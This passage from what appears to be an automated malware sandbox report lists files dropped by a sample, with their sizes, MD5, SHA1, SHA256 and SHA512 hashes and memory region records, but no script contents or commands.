                        8f861200363a9d9784b0be584bd90d3dc1f9b7f77710c6bd160e8d7c8989e6330b10e9cfecd25dd13158ab1d28d6925ef9135e73c185fe211de1129122aa2a1f

                      • C:\ProgramData\wu10.delete.bat

                        Filesize

                        255B

                        MD5

                        ee0996325569f1a4739509708717f8f3

                        SHA1

                        3514f1e94cb2f745ed8ff84875fd2d90a9e68bc7

                        SHA256

                        7631ab00b4b6868f57e9ed5e80bc5b12457ea912759490cbea95101f7918844a

                        SHA512

                        6b6a66ff69e4945328a868a31ef07cac425a1372c77e9cd090d5637d9686555506ce851d72473263d522bef07a9ba2bd39e59cc50f9218588dd0e00021068f4d

                      • C:\ProgramData\wu10.run.vbs

                        Filesize

                        131B

                        MD5

                        9acf11d00161e3f209c06e4577eb42c6

                        SHA1

                        bed9c68c145ce8bdf7f3d60d374891fd57e72bb1

                        SHA256

                        17432647b9096ed21d2a1ba618e11feef7f055f51abdd19ef23a85142ec1b51b

                        SHA512

                        271fc2d1264ac153c847a0ad75654bdeb2062217629e68e085f338c22a70e558d9f89c358e5428548f9ab0d754bfcd7d6211696f39535f2672a2b98c65b89baa

                      • C:\ProgramData\wu10.uac.bat

                        Filesize

                        366B

                        MD5

                        408e11f699d802ea56fabac297802c5e

                        SHA1

                        c07e71e98a52511dfd1c8ffb2803a41d6b9b3f8f

                        SHA256

                        1e86c340c81834db772c9e1e48f89534eeed9b386bc5b02d5907fc8f71ea4fe4

                        SHA512

                        e165b551abeba9ee85efc7d89b98fa822c203d24d5ce7e175acb7da43eab944a35a01fb3891ff7ad852a1cc33b549fbb96d84b8f10978bd5332b54fc2a22e126

                      • C:\ProgramData\wu10.wdcloud.bat

                        Filesize

                        1KB

                        MD5

                        c830fde2d469ea25922346b9166da248

                        SHA1

                        8dc4fa362b2f79b5294265981256e623553172f9

                        SHA256

                        59ee85c3ee8a0cb34a2b82168456748731d3ae81d15b0806ed861a5be0c012c1

                        SHA512

                        a045bca872978579e7d5039fdce839a6de98e4a8e5031a809653cdc0b11832a89d2076be0fc1d8456baaf62947e43934827b37cef815a8cee1918d80280656bd

                      • C:\Users\Admin\AppData\Local\Temp\CabF1FF.tmp

                        Filesize

                        70KB

                        MD5

                        49aebf8cbd62d92ac215b2923fb1b9f5

                        SHA1

                        1723be06719828dda65ad804298d0431f6aff976

                        SHA256

                        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                        SHA512

                        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                      • C:\Users\Admin\AppData\Local\Temp\TarF378.tmp

                        Filesize

                        181KB

                        MD5

                        4ea6026cf93ec6338144661bf1202cd1

                        SHA1

                        a1dec9044f750ad887935a01430bf49322fbdcb7

                        SHA256

                        8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                        SHA512

                        6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                      • \Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe

                        Filesize

                        6.2MB

                        MD5

                        f29f5feaf2450576bf14ca53c90d0059

                        SHA1

                        7262f9605fdd224341aa01a3b5912c09171bfcdc

                        SHA256

                        18c282c1f2bbc302d317a2f4037072355910f3c3425f446a8a8692652a175520

                        SHA512

                        14dfa735b3e7fb1572122c43625be1e61b8c28b1c08cacfb7bd55172e8d2b8db6afa07b4e5822bbf90d9a5f34e368fe67b440779a1d0a01b71f5cb897803b25c

                      • \Users\Admin\AppData\Local\Temp\is-I7O8V.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp

                        Filesize

                        2.5MB

                        MD5

                        7b493e07a8a18509ad2e3fcb4a7e5fa9

                        SHA1

                        9f9b9e80000d1e5311ad66a8ee78df9ecbedde9c

                        SHA256

                        fee6096ebb65358593028523d91e380be7cdd9d1ff0c1da1aeff06b510ebb9da

                        SHA512

                        3dcb03337504bf41376f1ee3c6bf87a02704ab95befa965beae314d1f405bed5617ff25c7ba787507a726e5684ad6b8019e80b9e191b8b5a6b7bf2b9f799533a

                      • memory/1764-9-0x0000000000400000-0x000000000068D000-memory.dmp

                        Filesize

                        2.6MB

                      • memory/1764-62-0x0000000000400000-0x000000000068D000-memory.dmp

                        Filesize

                        2.6MB

                      • memory/2368-64-0x0000000000400000-0x00000000004D2000-memory.dmp

                        Filesize

                        840KB

                      • memory/2368-2-0x0000000000401000-0x00000000004A9000-memory.dmp

                        Filesize

                        672KB

                      • memory/2368-0-0x0000000000400000-0x00000000004D2000-memory.dmp

                        Filesize

                        840KB

                      • memory/2720-126-0x0000000000400000-0x000000000068D000-memory.dmp

                        Filesize

                        2.6MB

                      • memory/2756-40-0x0000000000400000-0x00000000004D2000-memory.dmp

                        Filesize

                        840KB

                      • memory/2756-128-0x0000000000400000-0x00000000004D2000-memory.dmp

                        Filesize

                        840KB